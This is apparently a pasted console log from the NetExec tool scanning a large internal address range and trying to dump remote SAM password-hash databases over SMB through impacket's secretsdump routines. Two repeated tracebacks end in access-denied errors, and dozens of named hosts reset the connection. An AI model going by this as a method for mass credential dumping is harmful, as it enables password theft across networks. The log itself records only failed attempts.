────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.194.149 445 OXFLT030014 [-] Connection Error: [Errno


104] Connection reset by peer
SMB 10.34.194.129 445 OXODT033021 [-] Connection Error: [Errno
104] Connection reset by peer
[03:27:27] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.194.138 445 OXODT031911 [-] Connection Error: [Errno


104] Connection reset by peer
SMB 10.34.194.155 445 OXODT030411 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.163 445 OXODT034111 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.137 445 OXODT030711 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.164 445 OXODT031641 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.157 445 OXODT031711 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.151 445 OXODT031821 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.162 445 OXODT0316121 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.148 445 OXODT031691 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.177 445 OXFLT030010 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.152 445 OXFLT030009 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.170 445 OXODT031671 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.161 445 OXFLT030016 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.179 445 OXODT034611 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.174 445 OXODT034811 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.150 445 OXODT031411 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.178 445 OXODT032521 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.165 445 OXODT032311 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.166 445 OXODT030311 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.175 445 OXODT034821 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.171 445 OXODT0316101 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.173 445 OXODT031311 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.169 445 OXODT032511 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.176 445 OXODT031661 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.181 445 OXFLT030013 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.168 445 OXODT032211 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.167 445 OXODT034211 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.180 445 OXODT030211 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.145 445 OXODT033431 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.159 445 OXODT032811 [-] Connection Error: [Errno
104] Connection reset by peer
Running nxc against 65536 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100%
0:00:00

You might also like